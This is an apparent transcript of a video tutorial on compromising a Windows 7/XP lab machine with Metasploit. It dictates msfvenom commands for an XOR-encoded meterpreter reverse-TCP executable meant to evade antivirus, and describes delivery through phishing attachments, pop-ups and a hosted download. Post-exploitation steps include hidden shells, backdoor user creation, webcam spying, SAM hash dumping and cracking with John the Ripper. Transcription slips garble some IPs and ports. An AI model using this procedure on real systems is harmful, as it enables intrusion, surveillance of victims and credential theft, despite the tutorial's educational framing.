In this, we'll see the hacking of Windows 7 system using Metasploit. The Metasploit is a very powerful framework, which is an open source framework for generating the vulnerabilities at the same time for scanning for the vulnerabilities on the target computer, target machine. Here in the virtual machine, you are going to set up two operating systems. One is Kali Linux, another is Windows 7. Here, our aim is to first create a malware, and we need to inject that malware onto the Windows 7. So in order to generate the malware, we will use Kali Linux as the host. Creating a malware. Malware means malicious software. So what this malicious software will do, whatever the task required by the hacker, that particular task will be done by the malware. The task may be like may be used for knowing the details of the SMB protocol, or knowing the details of the user, or knowing the details of password, or tracking something in the target computer, maybe any other malicious activity that can be performed by this malware. Here, create a malware which upon execution creates a reverse TCP connection. So the TCP connection in general will be in a forward direction. That means you will request the user, or you will request the server to which you want to connect. If the server accepts, then you will be in a connection with that server and you perform the communication. But here the reverse TCP means sense this particular malware will create a reverse TCP, that is from the target computer to your Kali Linux. So that automatically, that means Windows 7 indirectly is requesting you to establish a connection. This is what reverse. Actually, the communication has to go from the Kali to Windows 7. But what this malware is doing is it is doing in reverse. This is what we call TCP reverse connection or reverse TCP connection from target machine to the attacker machine. Let Kali Linux system IP address is 19.168.1.7. Here I have not fixed any static IP address in my experimentation. This IP address is set dynamically. That is, the DHCP will look after the generation of the IP address. And I'm going to use the Metasploit framework to generate this malware. And this malware need to be ported to the Windows 7 operating system. In order to generate this malware, I'm going to use a tool called MSF Venom. MSF Venom is a very powerful tool to generate a venom. Venom in the sense it's a poison. So there are several poisons that you can generate via using this MSF Venom. And this MSF Venom is used to generate our target, that is malware. What this malware will do is it will perform the reverse TCP connection. Whenever this reverse TCP connection was established, you will get a communication from the Windows 7 that I need connectivity with the Kali Linux. That particular connection we are going to observe via Metasploit. Now we'll see how to use this MSF Venom. MSF Venom -p in the sense the platform. For which platform you want to generate this Venom. In most of the Windows operating systems, the .exe is the executable format. So that is the reason we are going to generate an executable format malware, that too on the platform that will run on the platform Windows. And here in Windows we have 32-bit operating systems and 64-bit operating systems. So that reason we are going to choose a package that is Windows /x64 meterpreter /reverse underscore TCP. And on this particular package is used for generating this MSF Venom. Where this package exists, it will be available in the Metasploit itself. So it is available in the Metasploit itself because Metasploit consisting of many packages that will ease the attacker or the penetration tester for using the applications just like that, and no need to create the malwares or any other programs from scratch. Instead, they can directly use the packages that are available in the Metasploit and can generate whatever they want. So here next -A is for the architecture. To which architecture you want to target? This is x64 architecture, that is 64-bit architecture. And you are going to use the platform as Windows and output file as the executable file. And this executable file is XORed. That means the internal content of the executable file is in the exclusive OR operation, so that it should be remain undetected by the security devices that are available on the host computer. And as well as whenever you port it to the target computer, there also you should not that particular virus or malware that you have generated should not be in a position to detect by the security devices like antiviruses or any other intrusion detection systems or etc. So that is the reason this XOR operation is going to be used. And -B is a kind of code that is to be encoded, because whenever you perform encoding, sometimes it may not be detected by the security softwares that are on the target computer. But these are the Metasploit related vulnerability generation. Nowadays, many of the, not many, most of the antiviruses are able to detect the the viruses are malware that you have generated using the Metasploit. And here localhost is the L host is the local host. The reason is whenever the reverse TCP connection is established, to whom that Windows 7 has to request for. The Windows 7 has to request for the localhost. Localhost means the Kali Linux operating system. Since it is a TCP connection, there should be a port. So L port is equal to some, I have given the 444 force. And this entire input was included in the package _TCP. And finally, an executable will be generated. That executable will be placed in the -o/root/mygame.exe. This is the mygame.exe. This is an executable file that I am going to generate. We are going to see the tutorial 9. In this, we are dealing with the hacking of Windows 7 system or Windows XP operating system that I have created the virtual machine image. You can download from the Google Drive given this link, and you may use that Windows XP also. That is up to you. But if you use Windows XP, some little changes we are supposed to make in this. So this is the Kali Linux in which you try to log in with the root user. I have provided a video in my YouTube channel for the changing of the password of the Kali Linux. Usually up to 2019 version of the Kali Linux, you will get the username and password as root and tour. Where in case of from 2020 onwards, it was changed. The username is Kali and password is Kali. This user will act as a normal user, not a root user. For the reason you cannot have access to every resource. If any system resources are to be used, it will not be used by the normal user. It should be used only by the root user. Here MSF Venom -H help. These are the various options that are available in the MSF Venom. It is especially used to create the vulnerable application or vulnerable payload that to be fired on the Windows systems. The example is like this. You can use the MSF Venom -P Windows/meterpreter/reverse TCP, and L host is a local host. That means whenever that application was clicked by the user on the Windows operating system, to whom we need to connect. Actually, this L host should be the IP address of the L host should be the address of the Kali Linux, and there should be a port that must be connected. because it is a TCP connection, obviously it will be connected to a port. And -f is the output file that to be generated, and this output file will be saved, or output code will be saved in an executable file. Since in Windows environment, exe file will be the executable file. Now we'll use this to create an executable file. We can do some encryption things with the for generating this particular Venom application or Venom executable. That is, here if you look at it, this is targeting to the Windows 7 operating system, and whatever the command I have written here is for the Windows XP operating system. If you are targeting the Windows 7 as the target computer, then MSF Venom -p, since Windows 7 what I am using is 64-bit, so Windows /x64/meterpreter/reverse_TCP -a is the architecture. The architecture is x64-bit architecture, and the platform is Windows. -f is the executable file that to be written out, and this executable file to be remain undetected by the antivirus softwares that are available on the Windows computer. So for this, what you are going to do is, this object code that we will get out will be encrypted or encoded with the exclusive OR operation, that is x64 by exclusive OR operation, with a character encoding of /x00. With this /x00, the each and every bit that will be generated in the executable file will be encoded, or we can say will be encoded with the exclusive OR operation, XOR operation. So sometimes if this kind of things were happen, then it may be remain undetected by the security systems that are on the target computer. -I is the number of iterations to be performed for this encryption. That means only one XOR operation to be performed, or repeatedly you perform XOR operation for how many times. That is what we call -I is encoding iterations. -I3. That means 3 iterations you are supposed to perform for performing this encoding. And L host is the local host. If you don't know what is the Kali Linux IP address, you may use localhost like this. L port is equal to 44, and -o, which is the output file, will be saved in the mygame.exe. This is the way in the Windows 7 operating system you can do it. You may use the platform like this: MSF Venom -p Windows /meterpreter/reverse_TCP -a is x86 / platform Windows, like this. You may copy this and paste there. So this will generate a platform specific vulnerable executable. Whenever this platform specific vulnerable executable was created, then that must be ported onto the target computer. Here, this is x86 for the x86 platform, and you can also generate the same for the 64 architecture also, 64-bit architecture, which is for the Windows 7. You may use this this one with the encoding. Without encoding, you can directly use the creation of the, or you can directly create the Venom executable like this. Once it is done, then it must be injected into the target computer. How you can inject into the target computer? You may use any social engineering technique. Either you may send a mail with some attachment in which the Venom executable may be included. So whenever that attachment was downloaded and run by the user on the target computer, then a reverse TCP shell may be created. This is one way. Second way is using spoofing or redirection attack. The the session may be diverted to the website created by the attacker, and in that attractive advertisements, drop downs, or maybe pop-ups, or maybe any messages which will tempt the user to click on that. Whenever he click it, this particular executable will be downloaded onto the target computer. This is one way you can do it, or by sending some personal invitations or gifts kind of messages. Whenever the user clicks that, that particular executable has to be downloaded on the machine. So this is the way you are supposed to you can inject this particular executable onto the target computer. Once this mygame.exe was created, service Apache 2 start, and that mygame.exe file should be ported onto the Apache server. So the Apache server you will find at the position, that is whatever the mygame.exe that you generate, that you are supposed to move this mygame.exe to /var/www/html. This is the root folder of the Apache server. So you are supposed to run the Apache server. So the server was started now. How can you say the server was started? So go to the Windows XP platform, and there you click on the Internet browser, Internet Explorer. There you type the command, type the address http://190.168.1.33, which is the Kali Linux operating system IP address. Then you will get the home page of the Apache 2 server. Now, where this server located? This is in the /var/www/html. In this is the index.html file that will generate. Since I need to port this mygame.exe to this HTML, so I have copied this mygame.exe into the HTML. Now what you can do is assume that this is the user screen, or this is the user computer in which a user is browsing the browser. Now you should make the executable to download on the user computer. So either you may use pop-ups, or you may use advertisements, or you may use some links. So you may use anything. Finally, you should make the executable to download on the computer. mygame.exe. You look at it is asking you to download mygame.exe. So now user may click this save. He may save it on desktop. Okay. So now the mygame.exe is available here. Whenever this mygame.exe is available, then you are supposed to use the or run the MSF console, that is Metasploit console. From the MSF console, you have to use multi/handler. So multi-handler means it will be the handler which will handle multiple protocols, either the reversing via TCP or DNS reversing, or HTTP reversing, or Android systems based reversing, maybe any other reversing that will be handled via this multi-handler. So here we have used the payload Windows Meterpreter Reverse TCP. The same payload we are supposed to use when we work with the multi-handler, because the same payload is on the vulnerable executable. So the same payload we have to use here, and you have to exploit. Now the Metasploit was opened. Now what you are supposed to do is use multi/handler. So by default, it is configuring the payload generic/shell_reverse_TCP. But we need a payload set payload as, what is the payload we require? Windows slash meter slash reverse underscore TCP. Because this is the payload we have included in the vulnerable system or vulnerable application. So this is, so now the payload was set as meter reverse underscore TCP. Now show options. It will show you the options that are to be set. Here the options to be set is L host. L port is 4 ports. We no need to set again. Here L host to be set. L host is the local host to be set. Set L host 19.168.1.33. This is the IP address of the Kali Linux. Now the L host was set. Exploit that payload was set. L host was set. Port was set. Now we need to fire it. So for this, you are supposed to use exploit. Now whenever you say exploit, now this will be listening to the port 444, and some request has to come from outside, then immediately it will catch up that link. Now here an innocent user is sitting on the Windows XP. He is tempted to install this mygame.exe. He double clicked this, run it. He didn't get any window here, but what happened on the other side, a meter session was opened. Meter session 1 opened, and now the connectivity was happened between the Windows XP and Kali Linux. This innocent user is trying that something is happening here, but nothing was happened. Okay, but internally what has happened? A reverse link was created to the attacker. Now this mygame.exe may be attached with any original application. If the original application was clicked, automatically this mygame.exe may also be opened. Whenever this connectivity has happened, here you will get a meter connection. Okay, meter connection. In this meter connection, you may use the commands given here to know the details. Get UID. It will display the target system's username. Okay, get UID. The target system username is ETH-2019 by ETH. This is the user ID. That is computer name that you will get. And if you type get system, you will get the admin privileges, in memory admin. Then sysinfo, you will get the system information. They are using Windows XP, Service Pack 3, 5.1 build 2600. All the details related to that, we will get it here. Now what I will do is, I will execute command prompt. Execute -f cmd.exe. It should be executed in the hidden mode. You look at here, whatever the desktop, whatever the command prompt of the Windows XP that I got here. Now in the Windows XP command, ipconfig, Windows XP command prompt, Windows XP IP is 19.168.1.4. To test it, we'll run the same ipconfig. What is the IP? 19.168.1.4. That means the Windows XP system is in full control of the Kali Linux. Okay. Now what I am doing is, I will write like this: echo, you have been hacked, onto the readme.txt. On Windows XP, you will find here readme.txt. If you open this, it was given here, you have been hacked. Clear? This is the way we can perform reverse TCP and can get the control of the Windows operating system. And now I have closed this. Now I can run the command. I can run the control from the Kali Linux like Notepad. I will click Notepad. Notepad must be appeared here. Notepad must start over here. And you can see the list of users that are available on the computer. Net users. So here administrator is there and guest user is there. Okay. Usually the users can be created only by the administrator. So what I will do is net users test1. This is the username password test1/add. Now the command completed successfully. Whenever the command completed successfully, we'll see net user. You look at administrator guest. I have created test1. That means here the attacker can create his own user, and this test1 may be hidden or may be given with the administrative privilege. So this is the way how the Windows hacking can be done with the help of Metasploit, Meterpreter, and MSF Venom. You can do every activity that you want on the Windows operating system. See, you look at here. Notepad was opened, right? So it is taking some time for sending the control to the Windows XP, and now Notepad was opened. Like that, whatever the executable are there, that you can open it. And you can also open the things like webcam. So I have clicked the webcam here, integrated camera, and this integrated camera will be installed here. So like this, you can also access the webcam of the target computer. So for this, you need to go back to the Meterpreter command. Control C. Yes. You need to go back to the Meterpreter command, and there you are supposed to type webcam list. So you look at here, USB video device. That means you can access this USB video device that is on the Windows XP platform. You can observe here, along with ETH, test1 is also created. This test1 was created by the attacker computer, that is from Kali Linux. Whenever the webcam is enabled, then related drivers will be installed here. And if you want to go for installing of the full-fledged drivers, then you are supposed to go for device, insert guest editions CD image. Whenever you click this, automatically the driver and its supported softwares will also be installed by the guest edition CD image that is included in the virtual machine. Then only your web camera will work, because the web camera has to work via virtual machine. That is the reason you require to install this insert guest editions CD image. This will be automatically installed whenever you include this extension pack of the related virtual machine. We'll see the webcam list, webcam underscore list. Here one webcam was shown. Let me try to connect to this webcam underscore stream. So from which here, if you find multiple your webcams, then you have to choose from which webcam you want to show the output. So I am selecting on one. So this is the image of me. You can find this. So you are going to capture this particular thing. That means here from victim mission, you are going to capture this screen and That is, you are going to access the webcam and you are going to see this via the meter printer connection and especially via reverse TCP shell. So you should be very cautious when you are downloading any executable file. The reason is it may access your web camera. In addition, we may also take a snapshot of the camera and we can view the snapshot webcam underscore snap hyphen I1. So this is the snapshot you got. That means you can directly control the target computer once this reverse TCP shell or reverse TCP connection is successful. And many of these, this is a very plain way of taking the control of the target computer. However, there are some specialized things that in which you are going to create the malicious softwares that will not be detected by the antiviruses and security systems that are available on the target computer. Such such things require some specialized training and also deeper programming, in which especially you will understand the pattern of each and every antivirus that is running, that is currently in use. That antivirus corresponding code will be understood, and the functioning, especially like sandbox kind of functioning, will be understood. And via that, you will try to program it. It is somewhat a specialized thing compared to the normal way of doing this. Now we'll see some more options that are given in the tutorial. Get UID, check for the privileges. Get UID already we have seen. Check for the privileges also we have seen. Get system also we have seen. We have got the information of the system. That we'll see what we'll get whenever you say get system. So got system via technique 1, named pipe impersonation. So you are now admin user. Already we have seen how to create the users in the admin. That will see how to delete the users also. Simply you use net user and delete that user. Deletion of the user can be done like this. You need to go to the command prompt and we need to get that. That is execute -f cmd.exe -i -h. Now net user test1 / delete. So the deletion is successful. So if you say net user, so administrator and guest, test1 is the user deleted. Next we'll see the system sysinfo, where it will provide you the system information. So for this you need to go back, Control C. Yes. So we need to go to the meter printer command. Then sysinfo. So we'll get the system information that is also we have seen. Next hash dump. Hash dump. Well, you got this hash dump, that is administrator, and this is the hash code you got. You are supposed to use this. You are supposed to get the reverse of this hash. The reverse of this hash, that is, whenever you convert this hash to plain text, then you will get the password. That is the administrator password. Like that, ASP.NET is there, for which you are having a user and ASP.NET user and corresponding password. ETH is the user, corresponding password. Guest is the user, corresponding password. Like that. Text editor, and there we'll save this, and we may use this for cracking the password. So WinXP passwords. So previously we have seen how to crack the password using Metasploit. Previously we have seen how to crack the passwords using Hashcat and John the Ripper. We may use Hashcat or John the Ripper to crack the password. In the tutorial 7, we have seen how to crack this password, especially NTLM passwords. This is actually SAM dump. So whenever you type the command hash dump, this SAM dump will be given to you. The SAM dump is the security accounts manager dump, which will store the passwords in the NTLM hash format. NTLM password, and we need to use the hashcat and use the pre-defined dictionary. We may perform the brute force attack or dictionary-based attacks to perform the cracking of this password. So how to crack the passwords and all, you may view that video of the cracking passwords using hashcat and John the Ripper, and you can come to know that. So here I have directly give command. You copy the NTLM hash and use the John the Ripper format. So John hyphen format is equal to LM, that is LM underscore NTLM, that is NTLM format, and password.txt. Open a new command prompt, and there you type echo and copy the selection, that is the first one, that is 44E, and this one. Copy it just to paste here. This one to be echoed into password.txt. So now the password.txt consisting of this hash code. Now the next step is that will see whether this password.txt is created or not. Yeah, here password.txt is created. Now you use the John the Ripper command. John hyphen format John. So this is the John. Create John hyphen format is equal to LM, because this is NTLM hash. LM space, we have already saved in a file, that a hash is saved in a file called pwd.txt. pwd.txt. So in this entire thing, you'll find here using default input and all the things. Here somewhere you will get the question mark. Look at 123456 is the password of the administrator. Obviously, the password of the administrator is 123456. So that means because of placing of the weak passwords like 123456, John the Ripper is able to identify this very fast. So let will do some another experimentation. That is, you create one more user of your choice with the weak password. So how to create that? You can go to the meterpreter command. There you may go to the execute hyphen fcmd dot exe hyphen I. Now net users test1 and test1234 is the password. Add. So now the user is added successfully. Now go back. Since the user is added successfully, the Windows XP is storing this password in the hash format. Now you type the hash dump. Here test1 is there. Test1 hash is available here. Just to copy this and go to this command prompt and echo paste the selection. This you divert to the pwd.txt. Now use the John the Ripper. The password is test123, right? So this is the simple experimentation that we have done. We have created a user and also we have created the password, and we got the SAM dump via hash dump, and those hashes are used for the analyzing of the password. We have used John the Ripper. Either you may also use Hashcat. Anyhow, John the Ripper is the inbuilt tool that I am using here. You may try with the Hashcat also. That's all for this video. You try the password cracking and getting the access of the target computer on the Windows 7 operating system. The procedure is same. Only difference is you are supposed to use the x64 meter. Here in the Windows XP, I am using the normal meter. And one more thing is, this entire thing is only for the education purpose. Don't use it on the official organizational networks. It will be punishable offense. We will meet with some more concepts in the next videos.